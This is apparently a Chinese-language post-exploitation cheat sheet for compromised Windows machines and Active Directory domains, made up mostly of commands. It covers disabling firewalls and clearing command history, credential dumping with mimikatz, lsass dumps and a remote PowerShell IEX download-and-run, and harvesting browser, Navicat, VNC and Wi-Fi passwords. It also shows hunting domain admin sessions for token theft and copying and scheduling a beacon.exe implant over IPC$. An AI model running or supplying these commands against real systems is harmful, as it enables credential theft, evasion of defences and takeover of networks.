在提权完成后,尽可能多的收集此机器上的各种信息。
当前机器的角色
当前机器所在网络的拓扑结构
当前机器的网络位置/区域
ip、进程、端口、服务、共享、软件、补丁、wifi、rdp、
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 ------------------系统--------------------- set # 查看环境变量wmic bios # 查看bios信息 fsutil fsinfo drives # 查看盘符 systeminfo # 系统版本 systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" /C:"OS Name" /C:"OS Version" ------------------ip与网段--------------------- ping -a ip # ip反查主机名netstat -A ip # 同上 ipconfig /all #查看ip详细信息,关注是否多网卡、IP、DNSipconfig /displaydns #查看DNS缓存route print #查看路由 arp -a #查看arp缓存表 net view #查询机器列表type C:\Windows\System32\drivers\etc\hosts #查看hosts⽂件---------------端口-------------------- netstat -ano #查看端⼝开放情况 netstat -ano|findstr 80 #查看80 端⼝对应的PID ---------------服务-------------------- wmic service list brief # 查看安装的所有服务信息 net start # 已启动的服务---------------共享-------------------- wmic share get name,path ,status # 查看共享信息 net use # 查看已建立的连接net share # 查看共享net session # 查看会话net view \ip # 查询指定IP共享---------------开机自启动程序-------------------- wmic startup get command,caption ---------------安装的程序-------------------- wmic product get name,version powershell "Get-WmiObject -class Win32_Product | Select-Object -Property name,version" ---------------计划任务-------------------- schtasks /query /fo LIST /v > ed1dassc.txt ---------------补丁信息(提权)-------------------- wmic qfe get Caption,Description,HotFixID,InstalledOn systeminfo ---------------进程列表(免杀)-------------------- wmic process list brief #当前进程列表 tasklist #当前进程列表 tasklist /svc #查看进程、pid、服务 taskkill /f /t /im xx.exe #杀死xx.exe进程taskkill /F -pid 520 #杀死pid为520 的进程wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed ---------------查询IE浏览器的代理信息-------------------- reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" ---------------cmd 、powershell(v3以下)当前窗口的历史命令-------------------- Get-History | Format -List -Property * # 查询 powershell 当前窗⼝历史操作记录 Clear-History # 删除 powershell 当前窗⼝历史操作记录 Clear-History -Id 3 # 删除 指定 ID 的历史操作记录 doskey /h # 查看 cmd 的历史操作记录doskey /reinstall # 删除 cmd 的历史操作记录# powershell v3、v4 版本需要安装Get-PSReadlineOption msiexec /q /i PackageManagement_x64.msi # 查看 powershellv5 历史操作记录 type %appdata% \Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt---------------杂七杂八--------------------
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ---------------账户和密码信息------------------ whoami /all #查询当前⽤户权限等 net user #只显示本机的⽤户,不显示域⽤户net user <xx> #查看⽤户xx的具体信息wmic useraccount get #查看本机用户 或 域内所有账户 wmic useraccount get Caption,LocalAccount,Disabled # net localgroup #查看本地组net localgroup administrators #查看本地组administrators管理员组。除了显示本机中⽤户,还会显示域⽤户(前提是该域⽤户在本机的Administrators组内)query user 或 quser #查询当前在线⽤户 qwinsta #查询当前在线⽤户 qwinsta /SERVER:IP #查看远程登录情况 query session #查询会话 query termserver #查询远程桌⾯主机列表 net accounts #查看本地密码策略
1 2 3 4 5 6 7 8 9 10 11 12 13 14 ---------------远程桌面服务-------------------- #查端口 0 xd3d > 3389 REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber #是否开启了rdp服务:0 x1关闭,0 x0开启 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections #2003 开启远程桌面 wmic PATH win32_terminalservicesetting WHERE (_Class!="") CALL SetAllowTSConnections 1 #2008 、2012 开启远程桌面 wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ---------------防火墙开关 & 策略配置-------------------- netsh firewall show config #查看防火墙配置 #2003 之前操作 netsh firewall set opmode disable #关闭防火墙 netsh firewall add allowedprogram c:\nc.exe "allow nc" enable #允许nc的全部链接 #2003 之后操作 netsh advfirewall set allprofiles state off #关闭防火墙 netsh advfirewall set publicprofile state off #关闭防火墙,?? ##允许nc的入站、出站、TCP3389进站连接 netsh advfirewall firewall add rule name="pass nc" dir =in action=allow program="C: \nc.exe" netsh advfirewall firewall add rule name="Allow nc" dir =out action=allow program="C: \nc.exe" netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir =in localport=3389 action=allow ##自定义防火墙日志的存储位置 netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"
自动化收集脚本:Empire、VBS 脚本
判断是否在域中
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 # win10或2012 R2以上时,默认在内存缓存中禁止保存明文密码,需要修改注册表重启后才能。 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f # 简单抓密码 mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit " # 转储lsass.exe成dmp文件,再使用mimikatz本地读取(规避) procdump64.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" # powershell远程加载 powershell IEX (New-Object Net .WebClient).DownloadString(‘https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1’);Get-PassHashes # 转储SAM文件,再使用secretsdump.py本地读取(规避) python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL
内网使用 RDP 的机器大概率是运维或高权限机器,可筛选 LogonType 为 10 的 Win 日志,定位 ip,然后 ping -a <ip>
1 2 3 wevtutil qe /? wevtutil qe Security /c: 3 /rd: true /f:text # 3 条、最近的、txt格式,/q xpath语法 wevtutil qe security /q:"*[EventData[Data[@Name='LogonType']='10'] and System[(EventID=4624)]]" /f:text /rd:true /c:10
**一把梭:**HackBrowserData https://github.com/moonD4rk/HackBrowserData
1 2 3 4 5 6 7 8 #用户数据目录 %LOCALAPPDATA%\Google\Chrome\User Data\Default\ #缓存目录 %LOCALAPPDATA%\Google\Chrome\User Data\Default\Cache\ #书签 %LOCALAPPDATA%\Google\Chrome\User Data\Default\Bookmarks #Cookie %LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies #浏览历史 %LOCALAPPDATA%\Google\Chrome\User Data\Default\History #当前的session %LOCALAPPDATA%\Google\Chrome\User Data\Default\Current Session #账户密码 %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data %LOCALAPPDATA%\Google\Chrome\User Data\Profile 1\Login Data
1 2 3 4 5 6 7 8 ⽤户数据⽬录 %LOCALAPPDATA%\Tencent\QQBrowser\User Data\Default 缓存⽬录 %LOCALAPPDATA%\Google\Chrome\User Data\Default\Cache\ 书签 %LOCALAPPDATA%\Tencent\QQBrowser\User Data\Default\Bookmarks Cookie %LOCALAPPDATA%\Tencent\QQBrowser\User Data\Default\Cookies 浏览历史 %LOCALAPPDATA%\Tencent\QQBrowser\User Data\Default\History 当前的session %LOCALAPPDATA%\Tencent\QQBrowser\User Data\Default\Current Session 账号密码 %LOCALAPPDATA%\Tencent\QQBrowser\User Data\Default\Login Data %LOCALAPPDATA%\Tencent\QQBrowser\User Data\Default\xxxxxxxxxxx\6
1 账号密码⽂件 %APPDATA%\360se6\User Data\Default\apps\LoginAssis\assis2.db
1 账号密码⽂件 %APPDATA%\Mozilla\Firefox\Profiles\*.default-release\logins.json
1 书签⽂件 %USERPROFILE%\Favorites\xx.url
数据库管理工具、远程登录
1 2 3 4 5 6 7 MySQL HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers<your connection name> MariaDB HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers<your connection name> MongoDB HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB\Servers<your connection name> MSSQL HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers<your connection name> Oracle HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers<your connection name> PostgreSQL HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers<your connection name> SQLite HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers<your connection name>
1 2 xp/win2003 C:\Documents and Settings\USERNAME\Application Data\VanDyke\Config\Sessions win7/win2008以上 %APPDATA%\VanDyke\Config\Sessions
1 2 Xshell 5 %userprofile%\Documents\NetSarang\Xshell\Sessions Xshell 6 %userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions
VNC
1 2 3 4 RealVNC HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver Password TightVNC HKEY_CURRENT_USER\Software\TightVNC\Server Value Password or PasswordViewOnly TigerVNC HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4 Password UltraVNC C:\Program Files\UltraVNC\ultravnc.ini passwd or passwd2
VPN
1 mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 查看帮助 netsh wlan help 列出⽆线接 netsh wlan show interface 开启⽆线接 netsh interface set interface "Interface Name" enabled 显示连接过的WIFI的配置⽂件 netsh wlan show profiles 连接指定wifi netsh wlan connect name=xxxx 断开连接 netsh wlan disconnect 查看连接过的WIFI的配置⽂件(包含账号密码),需要管理员权限执⾏,然后使⽤type 命令查看配置⽂件 netsh wlan export profile interface=WLAN key=clear folder=C:\ type C:\xxx.xml批量显示wifi账号密码 for /f "skip=9 tokens=1 ,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear其它常⽤的命令: 导出配置⽂件:netsh wlan export profile key=clear 删除配置⽂件:netsh wlan delete profile name="" 添加配置⽂件:netsh wlan add profile filename=""
本地普通用户:只能查询本机信息
本地管理员用户:可以查域内信息。提升 Ntauthority 或 System 权限后作为域内的机器账户进行认证。
域用户:可以查域内信息。使用 kerberos 协议自动认证。
本地普通用户:本机计算机名\john
本地管理员用户:本机计算机名\administrator
域用户:域名\user01
几种判断方式
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ---------------利用计算机名和用户名判断-------------------- echo %userdomain% & hostname && whoami # whoami 前的就是域名或主机名set l # 本机主机名、域控主机名---------------利用DNS服务器一般也部署在DC上判断-------------------- ipconfig /all # <主 DNS 后缀>、<DNS 后缀搜索列表> 就是域名nslookup <主 DNS 后缀> # 得到域控ip ---------------利用时间服务器一般也部署在DC上判断-------------------- net time /domain 发生系统错误 5 #存在域,但当前用户不是域用户 \\XXX 的当前时间 #存在域,且当前用户是域用户 找不到域 WORKGROUP 的域控制器。 #当前为工作组环境 ---------------结果不为WORKGROUP则在域中-------------------- systeminfo | findstr 域: net config workstation | findstr 工作站域
查询域名、域策略、域信任关系、域计算机列表、域控、域管、域控
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 whoami /all # 获取用户SID,SID去掉后四位就是计算机/域SID sc showsid server # 获取某服务的SID ---------------查看有几个域名-------------------- net view //无参时:查看当前域或组内的其它计算机名称列表net view /domain //查看有几个域net view /all \\<ip/hostname> //带参数:查看远程计算机的文件共享列表,错误5 dir /Q \\<ip/hostname>\<共享名> //查看某个共享名type \\<ip/hostname>\<共享名>\<文件名> //查看共享文件copy .\backdoor.txt \\<ip/hostname>\<共享名> //上传本地文件到目标共享--------------获取域策略信息-------------------- nltest /domain_trusts //获取域信任信息 net accounts /domain //获取域密码策略net group /domain //查看所有域组名--------------获取域计算机列表-------------------- net view /domain:GOD //查看god域中的计算机列表net group "domain computers" /domain //查看所有域成员计算机列表--------------定位域控-------------------- nltest /DCLIST:<域名> nslookup -type =SRV _ldap._tcp net time /domain //一般时间服务器为主/备域控net group "domain controllers" /domain //通过域控组查询netdom query pdc //查看所有域控的主机名,命令不可用。。 --------------查域管理员用户-------------------- net group "domain admins" /domainnet group "Enterprise Admins" /domain--------------查询域用户-------------------- net localgroup administrators //查看本地管理员组(因为Domain Admins组默认属于域内机器的本地管理员组)net user /domain //查看域中所有的用户名,包括域管理net user <用户名> /domain //查看指定用户的详细列表wmic useraccount get /all //获取域用户的详细信息 dsquery //域控管理工具 dsquery user //查看域内用户 dsquery computer - 查找目录中的计算机 dsquery contact - 查找目录中的联系人 dsquery subnet - 查找目录中的子网 dsquery group - 查找目录中的组 dsquery ou - 查找目录中的组织单位 dsquery site - 查找目录中的站点 dsquery server - 查找目录中的域控制器 dsquery user - 查找目录中的用户 dsquery quota - 查找目录中的配额 dsquery partition - 查找目录中的分区 dsquery * - 用通用的 LDAP 查询查找目录中的任何对象
通过日志定位:指本地机器的管理员日志,可以使用脚本或 Wevtutil 工具导出查看
通过会话/进程定位:指域内每台机器的登录会话,可以使用 netsess.exe、PowerView 等工具匿名查询。
漏洞拿机器,然后抓域管明文或 hash?
PS: 当拿下边界服务器进行横向移动时,需要先知道当前域用户的登录位置、是否是其它系统的本地管理员、所属组、是否有权访问文件共享。
服务器加域后,系统会自动将 domain admins 组加到域成员服务器的 administrators 组,因此域管理员组的成员均可访问本地计算机,并具有管理员权限。
常用工具:psloggedon.exe、PVEFindADUser.exe、netsess.exe、hunter、NetView、PowerShell - PowerView
查询域内信息的一款工具,主要用来修改账户属性、 新增机器账户,其它查询功能较为常规。
net session 可以查看谁使用了本机资源,使用 psloggedon 可以查看本地登录的用户和通过本地计算机或远程计算机进行资源登录的用户。原理是:调用 NetSessionEnum API 检查注册表 HKEY_USERS 项的 key 值来查询谁登陆过。
1 2 3 4 5 psloggedon.exe - # psloggedon.exe -l #仅显示本地登录 psloggedon.exe -x #不显示登录时间 psloggedon.exe \\<计算机名> #列出指定计算机的登录信息 psloggedon.exe <用户名> #指定用户名,在网络种搜索该用户登录的计算机。
PVEFindADUser 用于查找活动目录用户登录的位置、枚举域用户,以及查找在特定计算机上登录的用户,包括本地用户、通过 RDP 登录的用户、用于运行服务器和计划任务的用户,该工具需要管理员权限。
1 2 3 4 5 6 7 8 9 netview.exe -h #帮助 netview.exe -f filename.txt #指定要提取主机列表的文件 netview.exe -e filename.txt #指定要排除的主机名的文件 netview.exe -o filename.txt #将所有输出重定向到指定的文件 netview.exe -d domain 指定要提取主机列表的域。如果没有指定,则从当前域中提取主机列表 netview.exe -g group 指定搜索的组名。如果没有指定,则在Domain Admins组中搜索 netview.exe -c 对已找到的共享目录/文件的访问权限进行检查 netview.exe -i interval 枚举主机之间等待的秒数 netview.exe -j jitter 应用于间隔的抖动百分比(0 .0 -1 .0 )
netview 是一个枚举工具,使用 WinAPI 枚举系统,利用 NetSessionEnum 寻找登录会话,利用 NetShareEnum 寻找共享,利用 NetWkstaUserEnum 枚举登录的用户,netview 可以查询共享入口和有价值的用户,其绝大部分功能无需管理员权限就可使用。
1 2 3 4 5 6 7 8 9 netview.exe -h #帮助 netview.exe -f filename.txt #指定要提取主机列表的文件 netview.exe -e filename.txt #指定要排除的主机名的文件 netview.exe -o filename.txt #将所有输出重定向到指定的文件 netview.exe -d domain 指定要提取主机列表的域。如果没有指定,则从当前域中提取主机列表 netview.exe -g group 指定搜索的组名。如果没有指定,则在Domain Admins组中搜索 netview.exe -c 对已找到的共享目录/文件的访问权限进行检查 netview.exe -i interval 枚举主机之间等待的秒数 netview.exe -j jitter 应用于间隔的抖动百分比(0 .0 -1 .0 )
smb-enum-domains.nse 枚举域控,获取主机信息、用户、可使用密码策略的用户等
smb-enum-users.nse 扫描域控,获取更多的域用户信息
smb-enum-shares.nse 遍历远程主机的共享目录
smb-enum-processes.nse 对主机的系统进程进行遍历,目标主机运行着哪些软件
smb-enum-sessions.nse 获取域内主机的用户登陆会话,查看当前是否有用户登陆,且不需要管理员权限
smb-os-discovery.nse 收集目标主机的操作系统、计算机名、域名、域林名称、NetBIOS 机器名、NetBIOS 域名、工作组、系统时间等信息
令牌窃取,以达到域权限提升的目的?
方法 1:会话/进程检查域管
定位域管会话,拿下机器,抓域管密码。
定位域管进程,拿下机器,令牌窃取。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 # 单机查找 quser # 查看当前机器会话,关注是否有域管账户,导lsass.exe快照,抓明文 tasklist /v # 查看进程,关注进程启动用户,可能有域管,令牌窃取 - tasklist /v /fi "USERNAME eq 域名\域管名" # 批量检查域管进程 ## 先导一份域管名单 net group "Domain Admins" /domain # 查域管## 收集的待检查机器ip ips.txt ## p73 for 循环批量导远程机器进程,然后用域管名单筛选。 tasklist /v /s <ip> /u <user> /p <passwd> # 核心命令,查看远程机器进程,???此处存疑,当前账户可以登其它机器,不就是域管?
方法 2:批量搜索域控上的域用户会话
定位域管会话,拿下机器,抓域管密码。
1 2 3 4 5 6 7 8 9 # 1 、获取筛选信息 net group "Domain Controllers" /domain # 查域控机器名net group "Domain Admins" /domain # 查域管# 2 、netsess.exe 收集所有活动域的会话列表, 返回活动会话的ip、域账户、会话时间、会话空闲时间 # 3 、筛选得到域控上的域用户会话 p72 cmd for 命令
Get Domain Admins(GDA)批处理脚本一把锁
方法 3:批量搜索远程机器 NetBIOS
定位域管会话,某些版本 windows 允许用户通过 NetBIOS 查询已登录用户。
1 2 nbtstat -A <IP> # p73 for 循环
1、我是谁、我在哪、我的目标
2、信息收集
3、横向移动
NetBIOS 探测:
ICMP 探测:for in
ARP 扫描:arp.exe、Empire - arpscan、Nishang - Invoke-ARPScan.ps1
TCP/UDP 端口扫描:nmap、masscan、telnet、MSF - portscan 模块、Nishang - Invoke-PortScan.ps1、PowerSploit - Invoke-portscan.ps1
ICMP 探测
1 for /l %i in (1,1,255) do @ ping 172.16.1.%i -w 1 -n 1 | find /i "ttl="
cscript 1.vbs
ARP 扫描
动静是否会太大。
TCP/UDP 端口扫描
#DNS
DNS 区域传输漏洞
**DNS 区域传送(DNS zone transfer)**是指一台备用 DNS 服务器使用来自主 DNS 服务器的数据刷新自己的域(zone)数据库,从而避免主 DNS 服务器因意外故障影响到整个域名解析服务。
DNS 区域传送方式 :axfr:完全区域传送、ixfr:增量区域传送
DNS 区域传输漏洞 :一般来说 DNS 区域传送只在主备 DNS 服务器间使用,但由于主服务器错误配置,导致任意用户发起请求后可获得一个 zone 数据库的详细信息。
修复方式 :添加 allow-transfer,配置 ip 白名单
利用
1 nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=域名" -Pn -p 53 192 .168 .101 .152
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 建立IPC连接命令: net use \\191 .168 .52 .136 \ipc$ "password" /user:"Administrator"断开连接: net use \\x.x.x.x\ipc$ /del 查看连接是否建立: net use测试连接: dir \\191 .168 .52 .136 \c$拷贝木马: copy beacon.exe \\191 .168 .52 .136 \c$创建计划任务(at <2012 、schtasks>=2012 ): at \\191 .168 .52 .136 15 :47 c:\beacon.exe
数据库凭据 :抓 navicat 凭据、弱口令
1433 sqlserver sa 用户利用 xpcmdshell、sp_configure、sp *提权
#数据库/SQLServer
3306 mysql root 用户利用 udf 提权 #数据库/MySQL
1521 oracle #Oracle
6379 redis 未授权漏洞利用 #Redis
9200 ES 未授权
27017 MongoDB 未授权 #MongoDB
OA:通达、泛微、帆软
邮箱:coremail
shiro、solr、weblogic
VCenter
ESXI
天擎服务端
深信服 EDR
堡垒机
135 Wmihacker、ShareWmi
445 CS - psexec、MSF - exploit/windows/smb/、IPC 连接、Impacket 工具包(psexec、smbexec、wmiexec)
3389 RDP CVE-2019-0708
5985 WinRM
CS 4.1
毒液 Venom